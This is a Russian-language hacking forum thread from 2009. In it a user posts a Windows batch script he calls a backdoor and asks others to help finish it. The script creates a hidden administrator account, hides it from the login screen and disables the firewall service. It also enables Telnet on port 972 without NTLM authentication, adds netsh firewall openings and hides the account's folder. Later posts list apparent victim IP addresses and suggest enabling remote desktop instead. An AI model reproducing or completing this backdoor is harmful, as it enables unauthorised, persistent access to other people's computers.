Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Что не хватает в bat"нике ? (https://forum.antichat.xyz/showthread.php?t=125954)

Vlad&slav 19.06.2009 00:35

Что не хватает в bat"нике ?
 
Телнет - сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается "ручками", мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у жертвы. Делать это можно с помощью команд cmd
Для этого напишим батник :

PHP код:

chcp 1251
net user SUPPORT_388945a0 
/delete
net user qwerty 123 
/add
net localgroup Администраторы qwerty 
/add
net localgroup Administrators qwerty 
/add
net localgroup Пользователи SUPPORT_388945a0 
/del
REG ADD 
"HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /"qwerty" /t REG_DWORD /d 0 /f
net stop sharedaccess
sc config sharedaccess start
disabled
regedit 
/s conf.reg
sc config tlntsvr start
auto
tlntadmn config port
=972 sec=-NTLM
net start Telnet 


Всё вроде верно, но перестало работать :confused:
в том что комп включен уверен на 100%
можт кто блочит, но не все же компы махом 0_o
и адреса приходят

порыскаав по нету нашол команду netsh firewall


PHP код:

netsh firewall add portopening TCP 972 System 

или
PHP код:

Netsh firewall add portopening protocol=tcp port=972 mode=enable scope=all 

незнаю как правильно и многое ли ето даст

+ хочется добавить скрытость на папку с юзером в документс анд сеттингс
помоему команда
PHP код:

attrib ++h C:\Documents and Settings\qwerty >nul 

должна сработать
Отчётов уже огромный список а войти не могу =(

кто нибудь может помоч мне дописать этого бакдора до конца, учтя все мелочи стукните в аску 2218982
зарание спасибо

Vlad&slav 19.06.2009 00:39

вот нашол что вместо
PHP код:

sc config tlntsvr startauto
tlntadmn config port
=972 sec=-NTLM
net start Telnet 

лучше будет
PHP код:

sc config tlntsvr startauto >nul
tlntadmn config port
=972 sec=-NTLM
net start Telnet 
>nul 


Ponchik 19.06.2009 09:29

Ябы уже лучше открывалбы удалёный рабочий стол, тоже 1 батником открывается, токо гуглить надо

Cthulchu 19.06.2009 09:58

что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам? Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.

Vlad&slav 19.06.2009 13:40

Цитата:

Сообщение от Cthulchu
что значит открывается одним батником? На сервере что, сидит блонда, которая будет запускать эти батники, или у вас есть админский доступ к этим серверам?

ну это уже другая тема, с этим проблем нету)
Цитата:

Автор, если затираешь айпишник, то затирать нужно последние цифры айпишника, а не первые.
да какая разница....
ВСЁРАВНО СБОЙ :D
у мя их уж список набрался =( ток они сдохли !
Код:

.....................
77.40.12.36
80.90.236.240
82.200.252.13
82.207.38.182
82.207.63.63
91.124.246.64
92.115.31.129
92.46.216.175
92.46.218.171
93.80.114.100
93.80.114.100
94.41.141.100
95.52.219.149
95.52.220.11
95.52.23.76
95.59.37.124
 ....................



Время: 21:00